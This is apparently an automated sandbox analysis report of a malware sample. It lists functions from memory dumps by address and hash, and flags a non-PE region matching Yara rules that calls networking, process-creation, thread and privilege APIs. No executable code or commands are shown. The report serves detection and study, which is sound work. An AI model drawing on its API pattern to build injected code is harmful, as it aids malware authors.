Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7532cb0cb477953dcc90afb63b8a4f8b4e26f9aa55cac68b5810ac712f521376
Instruction ID: 39c0ac42c351203cdaec01dfc54721bcbc2a8364dfe2b32d2f88afd620f89d0d
Opcode Fuzzy Hash: 7532cb0cb477953dcc90afb63b8a4f8b4e26f9aa55cac68b5810ac712f521376
Instruction Fuzzy Hash: AC900271B0104813D211A5594505707000D97D1281F91C412A0414598E97968952B161

Uniqueness

Uniqueness Score: -1.00%

Function 03639840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0363984A

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 68d0c4b13c5b88256f9c15fcb09691f44db669334ae033edaf7bf24d247ef5ab
Instruction ID: 7a627ed3a2385b090a0492f36e50a03adf6d2cbce98b60a6ff20a2ce8c95515b
Opcode Fuzzy Hash: 68d0c4b13c5b88256f9c15fcb09691f44db669334ae033edaf7bf24d247ef5ab
Instruction Fuzzy Hash: 91900261B42085525645F5594405507400AA7E1281791C012A1404990D86669856E661

Uniqueness

Uniqueness Score: -1.00%

Function 03639710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0363971A

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7afe8b5bab4cd31071e28312a616cee4aa9c1efa52dfc0923ae7ee040109b088
Instruction ID: 7af39d49ce3f8a354274ed1fb87dd26df7379122a2a769ba47b028bb24373c8a
Opcode Fuzzy Hash: 7afe8b5bab4cd31071e28312a616cee4aa9c1efa52dfc0923ae7ee040109b088
Instruction Fuzzy Hash: 66900271B0104802D200A9995409646000997E1341F51D011A5014595FC7A588917171

Uniqueness

Uniqueness Score: -1.00%

Function 03639FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03639FEA

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 69760c03c4b9f20e648c577fa2b0a9856a47a20d676b30f406646e5d242236ba
Instruction ID: 20a5115481cc2c6297b1a549d5422447ed5603ef5749172178ceef44d8b9d284
Opcode Fuzzy Hash: 69760c03c4b9f20e648c577fa2b0a9856a47a20d676b30f406646e5d242236ba
Instruction Fuzzy Hash: F7900271B1118802D210A5598405706000997D2241F51C411A0814598E87D588917162

Uniqueness

Uniqueness Score: -1.00%

Function 03639780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0363978A

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1be6fea8686000608df2854d454a481c2179f785cd9a268318106932ea62f1c7
Instruction ID: 38dc58ed9f9cc6d25b9ab2f0b01656fcc47c8e71ad0f72bf414ac06f6c7a99b6
Opcode Fuzzy Hash: 1be6fea8686000608df2854d454a481c2179f785cd9a268318106932ea62f1c7
Instruction Fuzzy Hash: 8B900269B1304402D280B559540960A000997D2242F91D415A0005598DCA5588696361

Uniqueness

Uniqueness Score: -1.00%

Function 03639660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0363966A

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: aac3bb4fe42b040a1f8a3bc66d77db8ddaad160df4298c321729e873b00ba145
Instruction ID: 3ef74384633d457acfb78b1be4074d6af855341752c1e29ca5c214ac47dd138e
Opcode Fuzzy Hash: aac3bb4fe42b040a1f8a3bc66d77db8ddaad160df4298c321729e873b00ba145
Instruction Fuzzy Hash: 8E900271B0104C02D280B559440564A000997D2341F91C015A0015694ECB558A5977E1

Uniqueness

Uniqueness Score: -1.00%

Function 03639650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0363965A

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 642d27ec18c4e2f2b5710b508230c7a536ebf6857e62d3cd31ff6545cc40c752
Instruction ID: 2a53a176ed1bd8b2cc60cdad98843ee4d9308933216c0692e9e2903b1141ea10
Opcode Fuzzy Hash: 642d27ec18c4e2f2b5710b508230c7a536ebf6857e62d3cd31ff6545cc40c752
Instruction Fuzzy Hash: 7B900271B0508C42D240B5594405A46001997D1345F51C011A00546D4E97658D55B6A1

Uniqueness

Uniqueness Score: -1.00%

Function 036396E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 036396EA

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a74ebff2c8b88fa6cfd1c9fa45056b7addb68cab155d26b8594f8fc0cb253707
Instruction ID: 48b88e7d56cc4a6bc88957414da4967a48ebcd2c5ab9cd785ea67610f902e8c5
Opcode Fuzzy Hash: a74ebff2c8b88fa6cfd1c9fa45056b7addb68cab155d26b8594f8fc0cb253707
Instruction Fuzzy Hash: D3900271B010CC02D210A559840574A000997D1341F55C411A4414698E87D588917161

Uniqueness

Uniqueness Score: -1.00%

Function 036396D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 036396DA

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9e06bb9f3d52bd27cb9c004fb75ce8fe1db85ddf0e12d62c04b15bbe0f77ccd6
Instruction ID: eb5e8347eb0e1aa2754c65f3f38d71e210e5f122493817b85cd10664566a94f3
Opcode Fuzzy Hash: 9e06bb9f3d52bd27cb9c004fb75ce8fe1db85ddf0e12d62c04b15bbe0f77ccd6
Instruction Fuzzy Hash: DE900271B0104C42D200A5594405B46000997E1341F51C016A0114694E8755C8517561

Uniqueness

Uniqueness Score: -1.00%

Function 03639540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0363954A

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c2a6a34b692618d6f3540781b734043a21aeb1f4649cdfec7d4a239fc474ff1b
Instruction ID: 8f37f42dc744ba8800f2de14d2f423c80da9975305e01af8ce6a620832c3bab1
Opcode Fuzzy Hash: c2a6a34b692618d6f3540781b734043a21aeb1f4649cdfec7d4a239fc474ff1b
Instruction Fuzzy Hash: 67900265B11044030205E9590705507004A97D6391351C021F1005590DD76188616161

Uniqueness

Uniqueness Score: -1.00%

Function 036395D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 036395DA

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 07f5e48caf6a85200b1185516ff868e361f42c3e62119ee42198a2866f9ff60c
Instruction ID: ee793d2124f462d9ba1108b24293b0a8abb136e2f70b4988020eaac4602f230e
Opcode Fuzzy Hash: 07f5e48caf6a85200b1185516ff868e361f42c3e62119ee42198a2866f9ff60c
Instruction Fuzzy Hash: 059002A1B02044034205B5594415616400E97E1241B51C021E10045D0EC66588917165

Uniqueness

Uniqueness Score: -1.00%

Function 00EE6EE0, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 00EE6F88

Strings

wininet.dll, xrefs: 00EE6F3E, 00EE6F47
net.dll, xrefs: 00EE6F51, 00EE6FD7, 00EE6FAF, 00EE6FBB, 00EE6FE3

Memory Dump Source

Source File: 00000009.00000002.481398229.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 36929bf56bb9c5516f464b803779f1a6a7eb60f5e1e42caf5e63f10b2c5a8ca4
Instruction ID: e05a6ba27fb06e8aaeaa4c67e8751d8c7856aca1aefb96381415e520d202b963
Opcode Fuzzy Hash: 36929bf56bb9c5516f464b803779f1a6a7eb60f5e1e42caf5e63f10b2c5a8ca4
Instruction Fuzzy Hash: 9531A1B1601748ABC715EF69DCA1FA7B7F8FB58700F10841DF61A6B241D770A545CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00EE6ED6, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 82sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 00EE6F88

Strings

wininet.dll, xrefs: 00EE6F3E, 00EE6F47
net.dll, xrefs: 00EE6F51, 00EE6FAF, 00EE6FBB

Memory Dump Source

Source File: 00000009.00000002.481398229.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: a0d293fc26fb362872409bead03e2cb0df709ae12becf0d12aaba96b8aa288f2
Instruction ID: 5f5b3534f501f0909faa6df0fc25371ca651ebccc7c119952ad17eac7d5f4f81
Opcode Fuzzy Hash: a0d293fc26fb362872409bead03e2cb0df709ae12becf0d12aaba96b8aa288f2
Instruction Fuzzy Hash: E431D2B1601348ABC710EF69D8A1FABBBF4FB98704F10816DF6196B242D770A455CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00EE84C2, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 27memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00ED3B93), ref: 00EE84FD

Strings

.z`, xrefs: 00EE84EC, 00EE84F8

Memory Dump Source

Source File: 00000009.00000002.481398229.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 89838dc9c50bf5501b8130cbbfc130bd36bbcf98d999fd07bbb84202bf7c45c9
Instruction ID: f5c9aafe04cbd3c4ed1466fd0a06105b954231f9a41f68b45cf03f874f9f623f
Opcode Fuzzy Hash: 89838dc9c50bf5501b8130cbbfc130bd36bbcf98d999fd07bbb84202bf7c45c9
Instruction Fuzzy Hash: 93E092B6200218AFDB14DF55CC44EA77368EF84350F118689FD0967651CB31E911CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 00EE84D0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00ED3B93), ref: 00EE84FD

Strings

.z`, xrefs: 00EE84EC, 00EE84F8

Memory Dump Source

Source File: 00000009.00000002.481398229.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: 62f391eb32ffd0cecbd935d8d90090fe6a574f8a2180b240e5ba3e17fa6d4b38
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: A1E04FB12002086BD714DF59CC45EA777ACEF88750F014554FD0C57241CA30F910CAF0

Uniqueness

Uniqueness Score: -1.00%

Function 00ED7260, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 00ED72BA
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 00ED72DB

Memory Dump Source

Source File: 00000009.00000002.481398229.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 0d251a6efcd9bab6f901e207b7ee06c09f46ef66761929ea5bbfdc0c346a625e
Instruction ID: dec22b559680873c908cd8939e60958f822810f4893e57ef97e6bc665013ce55
Opcode Fuzzy Hash: 0d251a6efcd9bab6f901e207b7ee06c09f46ef66761929ea5bbfdc0c346a625e
Instruction Fuzzy Hash: 2101A771A8026C76E720A6959C43FFF77AC9B40B50F150119FF04BA2C2E694690647F5

Uniqueness

Uniqueness Score: -1.00%

Function 00ED9B20, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00ED9B92

Memory Dump Source

Source File: 00000009.00000002.481398229.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: false

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction ID: 897665674a47737bd2626398b96367cdd89fa244551053350a8f6fb85c7a5aac
Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction Fuzzy Hash: 3B011EB5E0020DBBDF10EBA5EC42F9EB7B89B54308F0441A5A908A7242F631EB15CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00EE853D, Relevance: 1.5, APIs: 1, Instructions: 43processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00EE8594

Memory Dump Source

Source File: 00000009.00000002.481398229.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 7e047ca725bb73c708f3302d76065d35682f4c8318f0b2891e6c4a23b5d5f837
Instruction ID: 59d26d26f5562c6b42429864b97a963b9da79af933b52d63656ed2916759d3df
Opcode Fuzzy Hash: 7e047ca725bb73c708f3302d76065d35682f4c8318f0b2891e6c4a23b5d5f837
Instruction Fuzzy Hash: C2019DB2204108BFCB54CF99DC80EEB77A9AF8C354F158258FA4DE7251D630E851CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00EE8540, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00EE8594

Memory Dump Source

Source File: 00000009.00000002.481398229.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: 7912eaea7104b99ba8c318aba4f84924124ab26e5061d0289eda54b709a72d47
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: BE015FB2214108ABCB54DF89DC81EEB77ADAF8C754F158258FA0DA7251DA30E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00EDD407, Relevance: 1.5, APIs: 1, Instructions: 40COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,00ED7C63,?), ref: 00EDD43B

Memory Dump Source

Source File: 00000009.00000002.481398229.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 0cd83cd37bafc4567e0bcbf7d4d95259e4794f366871e66c1b72551f58e796c9
Instruction ID: 84672735b925f4ce1d95b94c506cfe2469ac910fdf83e922d4493f276a300b52
Opcode Fuzzy Hash: 0cd83cd37bafc4567e0bcbf7d4d95259e4794f366871e66c1b72551f58e796c9
Instruction Fuzzy Hash: A0F059B1A982092EEF11EB606C43B7A7398DB51314F0456D6F81CFB2A3E66889964271

Uniqueness

Uniqueness Score: -1.00%

Function 00EE7010, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,00EDCCD0,?,?), ref: 00EE704C

Memory Dump Source

Source File: 00000009.00000002.481398229.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: false

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 89b5fcddf5cf94ebe47764815518dfbcb350786f50de0af2faf284d80b108530
Instruction ID: 83af57299182906da033f8d8ef734f2e7856d712beebb50c34cff7625db0a381
Opcode Fuzzy Hash: 89b5fcddf5cf94ebe47764815518dfbcb350786f50de0af2faf284d80b108530
Instruction Fuzzy Hash: A8E092333913583AE33065AA9C03FA7B39CDB81B20F540026FB4DFB2C1D595F80142A5

Uniqueness

Uniqueness Score: -1.00%

Function 00EE7006, Relevance: 1.5, APIs: 1, Instructions: 32threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,00EDCCD0,?,?), ref: 00EE704C

Memory Dump Source

Source File: 00000009.00000002.481398229.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: false

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: d7e87bef6fc75457e439379f0841d392bd7b0aba7ef7d4aba0e5ca7266bfd990
Instruction ID: b526380578a0d5d6cc530cb44d7190ebbb45009ec8e5d6e19e178c55417fec68
Opcode Fuzzy Hash: d7e87bef6fc75457e439379f0841d392bd7b0aba7ef7d4aba0e5ca7266bfd990
Instruction Fuzzy Hash: 51E0227339024037D2306A58CC03FA772989B80B10F590019F749BB2C1D5A0F90142A4

Uniqueness

Uniqueness Score: -1.00%

Function 00EE8621, Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,00EDCFA2,00EDCFA2,?,00000000,?,?), ref: 00EE8660

Memory Dump Source

Source File: 00000009.00000002.481398229.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 0befe4661d8e80fd42dd25ffd696f7280a6c4cbbad4c7b8803e0074d210d1b88
Instruction ID: 576b4cdbfbfa785347ae68f540793205a1c1403c411180fdac3f5646c63cb3e8
Opcode Fuzzy Hash: 0befe4661d8e80fd42dd25ffd696f7280a6c4cbbad4c7b8803e0074d210d1b88
Instruction Fuzzy Hash: 82E0EDB02402846FDB10EF69DD85FEB3B9AEF85350F048499FA086B342C930A910CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 00EE8490, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00EE3516,?,00EE3C8F,00EE3C8F,?,00EE3516,?,?,?,?,?,00000000,00000000,?), ref: 00EE84BD

Memory Dump Source

Source File: 00000009.00000002.481398229.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction ID: 8f3ac3695b6236a9958eda008c5a90a39febd2b084edf33ac77c9f37c45a7406
Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction Fuzzy Hash: 6FE012B1200208ABDB14EF99CC41EA777ACAF88650F118558FA086B282CA30F9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 00EE8630, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,00EDCFA2,00EDCFA2,?,00000000,?,?), ref: 00EE8660

Memory Dump Source

Source File: 00000009.00000002.481398229.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: a6adb228350258026c98abc263dfbfbd382a1a24ae1234b27ae9de431267f87e
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: 78E01AB12002086BDB10DF49CC85EE737ADAF88650F018554FA0C67241C930E8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 00EDD410, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,00ED7C63,?), ref: 00EDD43B

Memory Dump Source

Source File: 00000009.00000002.481398229.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
Instruction ID: 32f5b90ad039ce31502f23c9f0bcaaaef17374e05110e1692fbaa1795b7ceb9b
Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
Instruction Fuzzy Hash: D0D0A7717903083BE610FBA89C07F2672CC9B54B04F494064F949E73C3D960F5014561

Uniqueness

Uniqueness Score: -1.00%

Function 0363967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03639694

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1f382aa2008bdd841bc267a790d11d36fa1188bf4cb822925e32b84e64e22105
Instruction ID: 4f763dd08fd8919664c653606f3dfb2184e881dcecf2f501ff6afc7dbfc827e6
Opcode Fuzzy Hash: 1f382aa2008bdd841bc267a790d11d36fa1188bf4cb822925e32b84e64e22105
Instruction Fuzzy Hash: AEB09B71D464C5C5E715D7604708717794877D3741F16C051D1020691B4778C091F5B5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 036AB260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON

Download Yara Rule

Strings

If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 036AB314
The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 036AB3D6
an invalid address, %p, xrefs: 036AB4CF
*** then kb to get the faulting stack, xrefs: 036AB51C
*** An Access Violation occurred in %ws:%s, xrefs: 036AB48F
read from, xrefs: 036AB4AD, 036AB4B2
The resource is owned shared by %d threads, xrefs: 036AB37E
*** Inpage error in %ws:%s, xrefs: 036AB418
*** enter .cxr %p for the context, xrefs: 036AB50D
<unknown>, xrefs: 036AB27E, 036AB2D1, 036AB350, 036AB399, 036AB417, 036AB48E
This means that the I/O device reported an I/O error. Check your hardware., xrefs: 036AB476
Go determine why that thread has not released the critical section., xrefs: 036AB3C5
The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 036AB38F
The critical section is owned by thread %p., xrefs: 036AB3B9
The resource is owned exclusively by thread %p, xrefs: 036AB374
*** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 036AB2DC
The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 036AB323
write to, xrefs: 036AB4A6
a NULL pointer, xrefs: 036AB4E0
This failed because of error %Ix., xrefs: 036AB446
*** enter .exr %p for the exception record, xrefs: 036AB4F1
*** A stack buffer overrun occurred in %ws:%s, xrefs: 036AB2F3
*** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 036AB53F
The instruction at %p tried to %s , xrefs: 036AB4B6
*** Critical Section Timeout (%p) in %ws:%s, xrefs: 036AB39B
*** Resource timeout (%p) in %ws:%s, xrefs: 036AB352
The instruction at %p referenced memory at %p., xrefs: 036AB432
This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 036AB484
This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 036AB47D
This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 036AB305

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
API String ID: 0-108210295
Opcode ID: 99c7619936b404126e512af0a5a12663e488cdb3ec74e5936b1622ff711813c3
Instruction ID: 5054069e1395cab09c5870179dfb459a4f53af6384ec9ba53985616419363a5b
Opcode Fuzzy Hash: 99c7619936b404126e512af0a5a12663e488cdb3ec74e5936b1622ff711813c3
Instruction Fuzzy Hash: 4881F479A00610FFCB29EB09AC49D7E3B76EF4BA51F054148F1161F222D3A18852CFB6

Uniqueness

Uniqueness Score: -1.00%

